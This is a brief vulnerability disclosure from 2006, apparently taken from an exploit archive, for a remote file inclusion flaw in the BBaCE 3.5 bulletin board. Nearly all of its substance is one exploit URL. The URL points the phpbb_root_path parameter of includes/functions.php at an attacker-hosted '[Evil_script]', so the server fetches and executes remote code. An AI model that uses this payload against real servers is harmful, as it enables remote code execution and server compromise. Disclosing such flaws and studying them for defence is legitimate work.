id: 914
date: 10/01/2006
title: BBaCE <= 3.5 (includes/functions.php) Remote File Include Vulnerability
author: SpiderZ
cves: 

=======================================================================
BBaCE <= 3.5 (includes/functions.php) Remote File Include Vulnerability
=======================================================================


_________________________________________________________________________


           /      \
        \  \  ,,  /  /
         '-.`\()/`.-'
        .--_'(  )'_--.
       / /` /`""`\ `\ \           * SpiderZ Hacking Security *
        |  |  ><  |  |
        \  \      /  /
            '.__.'


# Author: SpiderZ
# BBaCE Remote File Inclusion Vulnerability
# For: BBaCE v3 ( Bulletin Board Ace )

_________________________________________________________________________




http://site.com/[path]/includes/functions.php?phpbb_root_path=http://[Evil_script]



#  0day.today [2023-03-22]  #